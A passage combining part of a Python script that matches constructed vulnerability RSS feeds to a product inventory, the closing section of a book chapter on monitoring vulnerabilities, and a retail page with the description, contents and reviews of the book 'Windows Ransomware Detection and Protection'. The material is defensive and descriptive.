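<rss version="2.0"><channel><title>Constructed vendor PSIRT feed</title>
<item><title>FortiOS SSL VPN authentication bypass (CVE-2099-0001)</title>
<link>https://vendor.example/psirt/0001</link>
<description>An improper authentication issue in FortiOS may allow an unauthenticated attacker to bypass the SSL VPN login.</description></item>
<item><title>Wireless access point firmware update</title>
<link>https://vendor.example/psirt/0002</link>
<description>Maintenance release; no security content.</description></item>
</channel></rss>"""

NIST_FEED = """<?xml version="1.0"?>
<rss version="2.0"><channel><title>Constructed NVD-style feed</title>
<item><title>CVE-2099-0001</title>
<link>https://nvd.example/vuln/CVE-2099-0001</link>
<description>FortiOS SSL VPN improper authentication.</description></item>
<item><title>CVE-2099-0002</title>
<link>https://nvd.example/vuln/CVE-2099-0002</link>
<description>Directory traversal in Citrix ADC management interface.</description></item>
<item><title>CVE-2099-0003</title>
<link>https://nvd.example/vuln/CVE-2099-0003</link>
<description>Buffer overflow in an unrelated media player.</description></item>
</channel></rss>"""

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_rss(xml_text):
    """Return feed items as dicts, with the CVE ids mentioned in each."""
    root = ET.fromstring(xml_text)
    items = []
    for item in root.iter("item"):
        title = item.findtext("title", default="")
        desc = item.findtext("description", default="")
        link = item.findtext("link", default="")
        cves = sorted(set(CVE_RE.findall(title + " " + desc)))
        items.append({"title": title, "description": desc,
                      "link": link, "cves": cves})
    return items


def match_inventory(items, inventory):
    """Keep only items whose text mentions a product we run, tagging it."""
    matches = []
    for it in items:
        text = (it["title"] + " " + it["description"]).lower()
        products = [name for name, keys in inventory.items()
                    if any(k in text for k in keys)]
        if products:
            matches.append({**it, "products": products})
    return matches


def correlate_by_cve(*feeds_items):
    """Merge relevant items from several feeds by CVE id, so the vendor
    advisory and the NIST record for one issue become a single entry."""
    merged = defaultdict(lambda: {"products": set(), "sources": []})
    for items in feeds_items:
        for it in items:
            for cve in it["cves"]:
                merged[cve]["products"].update(it["products"])
                merged[cve]["sources"].append(it["link"])
    return {cve: {"products": sorted(v["products"]), "sources": v["sources"]}
            for cve, v in merged.items()}


def relevant_advisories(inventory=INVENTORY):
    """One call for the Monday-morning review: CVE -> products and links."""
    vendor = match_inventory(parse_rss(VENDOR_FEED), inventory)
    nist = match_inventory(parse_rss(NIST_FEED), inventory)
    return correlate_by_cve(vendor, nist)


if __name__ == "__main__":
    for cve, info in sorted(relevant_advisories().items()):
        print(cve, info["products"], *info["sources"], sep="\n  ")
```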

While RSS feeds are one way to get this information, I also use some other online sources to monitor the current landscape:

  • Vulmon: This provides an automated way to get alerts and notifications related to vulnerabilities and can be mapped to products. You can get a view of the latest vulnerabilities here: https://vulmon.com/searchpage?q=*&sortby=bydate. In addition, you can use Vulmon as a search engine to find related vulnerabilities and more information.
  • Social media: Twitter can be an extremely useful service for monitoring current threats/vulnerabilities. As an active Twitter user myself, I have some main sources that I follow to stay up to date on current threats/vulnerabilities:
    • vFeed Inc. Vulnerability Intelligence As A Service (@vFeed_IO)
    • Threat Intel Center (@threatintelctr)

There are also products from third-party vendors that can automate this to scan the environment and look at current vulnerabilities, such as services from Qualys and Rapid7, which can be good tools to have in your toolbox when you are mixing a lot of third-party services in a large environment. It should be noted that these products do not have 100% coverage on all products/vendors, so it is still important that you have a mapping of your current application vendors and the services/applications they are providing, as well as ensuring that you are monitoring the status of each application.

Summary

In this chapter, we took a closer look at some of the main attack vectors that ransomware operators are using to get their foot in the door, by either using existing credentials or phishing attacks to lure end users and gain access to a compromised machine.

In most cases, attackers utilize one or multiple vulnerabilities either directly on an end user’s machine or to exploit external services that the organization has available.

We also took a look at some of the extortion tactics attackers use, in addition to other attack vectors, such as DDoS attacks, to pressure organizations into paying the ransom.

Then, we looked closer at some of the more well-known ransomware operators and their modus operandi, as well as some of the more frequently used attack vectors regarding identity and exploiting vulnerabilities and how they have been used in successful attacks.

Finally, we looked into how to monitor vulnerabilities and some of the sources that can be useful assets in your toolbox.

In the next chapter, we will start to look at countermeasures and build a secure foundation for our IT services, as well as adopt a zero-trust-based security architecture.


Key benefits

  • Learn to build security monitoring solutions based on Microsoft 365 and Sentinel
  • Understand how Zero-Trust access and SASE services can help in mitigating risks
  • Build a secure foundation for Windows endpoints, email, infrastructure, and cloud services

Description

If you’re looking for an effective way to secure your environment against ransomware attacks, this is the book for you. From teaching you how to monitor security threats to establishing countermeasures to protect against ransomware attacks, Windows Ransomware Detection and Protection has it all covered. The book begins by helping you understand how ransomware attacks work, identifying different attack vectors, and showing you how to build a secure network foundation and Windows environment. You’ll then explore ransomware countermeasures in different segments, such as Identity and Access Management, networking, Endpoint Manager, cloud, and infrastructure, and learn how to protect against attacks. As you move forward, you’ll get to grips with the forensics involved in making important considerations when your system is attacked or compromised with ransomware, the steps you should follow, and how you can monitor the threat landscape for future threats by exploring different online data sources and building processes. By the end of this ransomware book, you’ll have learned how configuration settings and scripts can be used to protect Windows from ransomware attacks with 50 tips on security settings to secure your Windows workload.

Who is this book for?

This book is for Windows administrators, cloud administrators, CISOs, and blue team members looking to understand the ransomware problem, how attackers execute intrusions, and how you can use the techniques to counteract attacks. Security administrators who want more insights into how they can secure their environment will also find this book useful. Basic Windows and cloud experience is needed to understand the concepts in this book.

What you will learn

  • Understand how ransomware has evolved into a larger threat
  • Secure identity-based access using services like multifactor authentication
  • Enrich data with threat intelligence and other external data sources
  • Protect devices with Microsoft Defender and Network Protection
  • Find out how to secure users in Active Directory and Azure Active Directory
  • Secure your Windows endpoints using Endpoint Manager
  • Design network architecture in Azure to reduce the risk of lateral movement

Product Details

Publication date: Mar 17, 2023
Length: 290 pages
Edition: 1st
Language: English
ISBN-13: 9781803246345

Table of Contents

15 Chapters
Part 1: Ransomware Basics
Chapter 1: Ransomware Attack Vectors and the Threat Landscape
Chapter 2: Building a Secure Foundation
Part 2: Protect and Detect
Chapter 3: Security Monitoring Using Microsoft Sentinel and Defender
Chapter 4: Ransomware Countermeasures – Windows Endpoints, Identity, and SaaS
Chapter 5: Ransomware Countermeasures – Microsoft Azure Workloads
Chapter 6: Ransomware Countermeasures – Networking and Zero-Trust Access
Chapter 7: Protecting Information Using Azure Information Protection and Data Protection
Part 3: Assume Breach
Chapter 8: Ransomware Forensics
Chapter 9: Monitoring the Threat Landscape
Chapter 10: Best Practices for Protecting Windows from Ransomware Attacks
Index
Other Books You May Enjoy

Customer reviews

Rating distribution: 4.8 out of 5 (5 Ratings)
5 star: 80%
4 star: 20%
3 star: 0%
2 star: 0%
1 star: 0%
Jay Mehta, Jun 22, 2023
5/5 stars
I must say, I came across a book that truly resonated with me. The author's writing style was so captivating that I found it hard to put the book down. The information and pragmatic approach provided in this book regarding Ransomware Detection and Protection would be certainly helpful to all Cyber Security analysts, engineers, architects, Offensive Security operators, or SOC analysts. Indeed, all chapters are very well organized and covered almost all aspects related to Ransomware. In short, I firmly believe that this book is a must-read for anyone who wants to pursue a career in the Cyber Security domain or has a keen interest in securing data. I highly recommend it!
Amazon Verified review
Tomica Kaniski, Jun 08, 2023
5/5 stars
I really liked the book as it's not too long, but packed with information about ransomware, and tips to ensure a solid, secure foundation in terms of covering all the essential technologies and services which will help you in battling not only ransomware, but also everything else. It's nice to see all the info gathered in this clear and not too long format - of course, for anyone needing more information about things covered like ransomware protection best practices, Microsoft Defender family, identity protection, monitoring, etc., many Internet sources cover it. For me, this list of essential things you know you should pay attention to, but can't really remember all when needed, in one place, makes this book a great read!
Amazon Verified review
Chip L., Jun 27, 2023
5/5 stars
I started reading this just because I was interested in learning more about Sentinel, and as I was reading, a former co-worker reached out to me about a cyber attack at his employer. I gave him some information out of the book and he decided to buy it. This book helped him out in navigating a ransomware attack. The style the author uses is easy to read and follow. You can pick this up with zero knowledge and get up to speed quickly, or if you are a hardened sys admin, you'll still find something here to learn.
Amazon Verified review
GUNDERSTONE, Jun 17, 2023
5/5 stars

This all-inclusive guide aims to provide you with the necessary knowledge and resources to effectively secure your Windows endpoints, cloud, and infrastructure against the ever-growing threat of ransomware attacks. The book delves into the core components of Windows technologies and provides valuable insights on utilizing Microsoft Intune, Sentinel, and Defender to detect and protect against ransomware. Whether you are a system administrator, IT professional, or interested in enhancing your cybersecurity skills, this book offers practical guidance, best practices, and real-world examples to help safeguard your Windows systems from malicious threats. Get ready to fortify your defenses and gain the confidence to combat ransomware with the help of this invaluable resource.

Author Marius Sandbu is a cloud evangelist and architect with over 17 years of experience in the IT industry, currently working at Sopra Steria in Norway. The author has a broad range of technical expertise in identity, networking, virtualization, endpoint management, and infrastructure, particularly emphasizing the public cloud. Marius is a prolific blogger, co-host of the CloudFirst podcast, and an international speaker at events like Microsoft Ignite and Citrix Synergy. He formerly served as the technical lead for the public cloud unit at Tietoevry and worked as a system administrator at the University of Oslo.

In an increasingly digital world, the threat of ransomware attacks looms large, posing significant risks to individuals and organizations alike. To combat this growing menace, "Windows Ransomware Detection and Protection" offers a comprehensive guide that equips readers with the knowledge and tools to secure their Windows endpoints, cloud, and infrastructure effectively. Authored by experts in the field, this book provides a deep dive into the complexities of ransomware attacks, explores various defense strategies, and offers implementable takeaways that can be immediately applied to enhance cybersecurity measures.

Chapter Summaries:

Chapter 1: Ransomware Attack Vectors and the Threat Landscape. In this chapter, the conversation focuses on the fundamentals of ransomware, exploring its origins, characteristics, and the devastating impact it can have on businesses and individuals. The various types of ransomware are discussed, including file-encrypting ransomware and locker ransomware, and highlight real-world examples to illustrate the severity of the threat.

Chapter 2: Building a Secure Foundation. This chapter concentrates on high-level design and security best practices. The critical components of constructing a security monitoring platform are closely examined. Building a secure foundation in Microsoft Azure using Microsoft reference architectures to safeguard your services and data is also reviewed. While many ransomware attacks originate from phishing attacks targeting end users, others begin with hackers exploiting vulnerabilities or conducting brute-force attacks on external services, then moving through the network by exploiting gaps they discover. There have also been instances where attackers use fake or Trojanized applications to gain access through backdoors or as part of a supply chain attack. If your company is considering migrating to the cloud, it is essential to establish a secure foundation that incorporates best practices from cloud platform vendors and meets your current needs. This chapter reviews the following topics: Zero-trust design principles for a secure foundation, Building secure network access, Managing identity and access control, Fundamentals of security logging and monitoring, and Key components of constructing a secure foundation in Microsoft Azure.

Chapter 3: Security Monitoring Using Microsoft Sentinel and Defender. As organizations increasingly adopt cloud computing, addressing the unique security challenges ransomware poses in cloud environments is essential. In this chapter, the discussion focuses on utilizing tools such as Microsoft Sentinel, Microsoft Defender for Endpoint, and Microsoft Defender for Servers to detect abnormal activities within environments. The chapter continues by examining how these services operate and how to use them effectively, focusing on the capabilities of Microsoft Defender for vulnerability management. The topics include an overview of Microsoft Sentinel and Microsoft Defender, designing and implementing Microsoft Sentinel, using Kusto to query data logs, creating analytics rules in Sentinel, and monitoring vulnerabilities with Microsoft Defender.

Chapter 4: Ransomware Countermeasures – Windows Endpoints, Identity, and SaaS. Ransomware attacks often exploit vulnerabilities in network infrastructure to propagate and spread across an organization's systems. In this chapter, the content goes deeper into various countermeasures that can help reduce the risk of ransomware attacks on critical attack vectors, including endpoints, identity, email services, and network attacks. Topics reviewed include: securing Windows endpoints with Microsoft Intune and Azure AD endpoints, implementing attack surface reduction rules and browser protection mechanisms such as SmartScreen and Application Guard, safeguarding user identities in Azure AD and SaaS services, improving email security in Office 365 to reduce the risk of phishing attacks, and additional tips and tricks for securing Windows endpoints.

Chapter 5: Ransomware Countermeasures – Microsoft Azure Workloads. Despite the best preventive measures, organizations may still fall victim to ransomware attacks. As more organizations migrate their virtual machine workloads to the cloud, it is crucial to understand the various security mechanisms and the appropriate architecture before deploying infrastructure. In most cases, individuals and organizations that have fallen victim to ransomware or had information exposed after moving their workloads to the public cloud were due to a lack of knowledge or inadequate security measures. This chapter explores the theory behind constructing a secure architecture in Microsoft Azure for virtual machine workloads. It covers the following additional topics: network segmentation and design best practices in Microsoft Azure, protecting external services with DDoS and WAF mechanisms, security best practices for Identity and Access Management in Azure, safeguarding hybrid workloads with Azure Arc, identity and access management in Microsoft Azure, and data protection using Azure Backup and Azure Policy.

Chapter 6: Ransomware Countermeasures – Networking and Zero-Trust Access. Most ransomware attacks originate from a compromised device or an externally available vulnerable service, such as a VPN or VDI, which attackers exploit. These attacks typically provide the attacker with an initial foothold, allowing them to gain further access to the infrastructure. Many of these attacks can be prevented if the end-user device does not have access to the infrastructure or the service is not externally available. This chapter reviews alternatives for securely accessing services externally using a zero-trust-based access model without exposing ourselves to the same risks. It also examines best practices for network segmentation and security for Windows-based workloads and methods for protecting our external web services from Distributed Denial-of-Service (DDoS) attacks, an increasingly common attack vector. Additionally, the chapter reviews SASE service models and how they can help reduce the risk to the mobile workforce. The topics covered include zero-trust network access and SASE services, network segmentation, firewalls, access control, and DDoS protection and security for new web services.

Chapter 7: Protecting Information Using Azure Information Protection and Data Protection. In recent years, ransomware attacks have evolved from simply encrypting data to exfiltrating it because many companies realized they could restore encrypted files from backups, negating the need to pay the ransom. To increase the likelihood of receiving payment, ransomware groups have begun exfiltrating any data they can find. In this book chapter, the author explores how to use services to encrypt data and lower the probability that it falls into the wrong hands. Built-in Windows and Azure Information Protection (AIP) services are reviewed and shared best data protection and backup practices are discussed. The topics include the importance of classifying and encrypting your data, an overview of AIP, DLP features and the future of AIP, encrypting SQL-based workloads, and best practices for data protection and backups.

Chapter 8: Ransomware Forensics. No matter how many countermeasures are implemented or how advanced the security measures are, it is impossible to be wholly protected from cyberattacks. As such, it is crucial to know how to respond in the event of an attack and to conduct a post-incident review to determine how the attack occurred. Many corporations that have fallen victim to ransomware and paid the ransom have been attacked again just weeks later because they failed to address the vulnerability or implement appropriate countermeasures. This chapter covers conducting ransomware forensics and responding to an attack, examining the filesystem, registry, and events from your infrastructure, identifying the type of ransomware and common attack vectors, and removing the entry point used by the attackers after restoring your systems.

Chapter 9: Monitoring the Threat Landscape. The threat landscape is constantly changing, making it essential for IT professionals to have access to tools and news sources that enable them to stay informed about current threats. This chapter offers advice on monitoring the threat landscape for emerging threats using various online sources and processes to stay up-to-date. The chapter also discusses trends observed in the past year and critical factors for protecting workloads against future threats. The topics covered include monitoring the threat landscape, implementing processes to manage threats, and predicting future developments in the threat landscape.

Chapter 10: Best Practices for Protecting Windows from Ransomware Attacks. The book's final chapter focuses on configuration settings and scripts that can help protect Windows from ransomware attacks. The material covered delves into specific security policies, baseline settings, and other best practices. Topics discussed include best practices and security settings for Windows, managing remote desktops and administrative shares, using the Windows Firewall and LAPS, automatically patching infrastructure, utilizing the File Server Resource Manager, and additional tips for reducing the risk of ransomware attacks.

Implementable Takeaways from "Windows Ransomware Detection and Protection" PDF:

1. Stay Informed: Keep yourself updated on the latest trends and techniques ransomware attackers use. Regularly monitor security news, attend webinars, and participate in relevant forums to stay ahead of emerging threats.
2. Educate and Train Employees: Ransomware attacks often exploit human vulnerabilities, such as phishing emails or social engineering tactics. Establish extensive security awareness training programs to inform employees about potential threats and best practices for recognizing and avoiding them.
3. Implement Multi-Layered Security: Relying on a single security solution is insufficient to protect against ransomware. Implement a multi-layered security approach that includes robust endpoint protection, network security measures, and cloud security controls. Regularly update and patch all software and systems to address known vulnerabilities.
4. Backup and Disaster Recovery: Regularly back up critical data and ensure backups are stored securely and offline. Test the restoration process periodically to ensure data integrity and availability during a ransomware attack. Consider implementing a disaster recovery plan to minimize downtime and ensure business continuity.
5. Implement Least Privilege Access: Limit user privileges to only what is necessary for their roles. Implement the principle of least privilege to minimize the potential impact of a ransomware attack. Regularly review and revoke unnecessary privileges to reduce the attack surface.
6. Monitor and Detect: Implement robust real-time monitoring and detection mechanisms to identify potential ransomware attacks. To promptly detect and respond to suspicious activities, utilize security tools such as intrusion detection systems, endpoint detection and response solutions, and security information and event management (SIEM) systems.
7. Develop an Incident Response Plan: Develop a detailed incident response plan that specifies the actions to be taken during a ransomware attack. Define roles and responsibilities, establish communication channels, and conduct regular drills to ensure a swift and coordinated response.
8. Engage in Threat Intelligence Sharing: Collaborate with industry peers, security vendors, and relevant communities to share threat intelligence and stay updated on the latest ransomware trends. Participate in information-sharing platforms and leverage threat intelligence feeds to enhance your organization's defenses.
9. Regularly Test and Update Security Measures: Conduct regular security assessments, penetration testing, and vulnerability scanning to identify and address any weaknesses in your security infrastructure. Keeping all software and systems current with the most recent security patches and updates is essential.
10. Continuous Improvement: Regularly assess and update your security measures. Conduct security assessments, penetration testing, and vulnerability scanning to identify and address any weaknesses in your security infrastructure. Regularly installing security patches and updates is essential to keep all software and systems current.

Amazon Verified review
Agustin, Jul 14, 2023
4/5 stars
Super detailed book focusing on how to protect Windows systems from attacks and ransomware, focusing on Microsoft security and IR tools and the Azure Cloud environment.
Amazon Verified review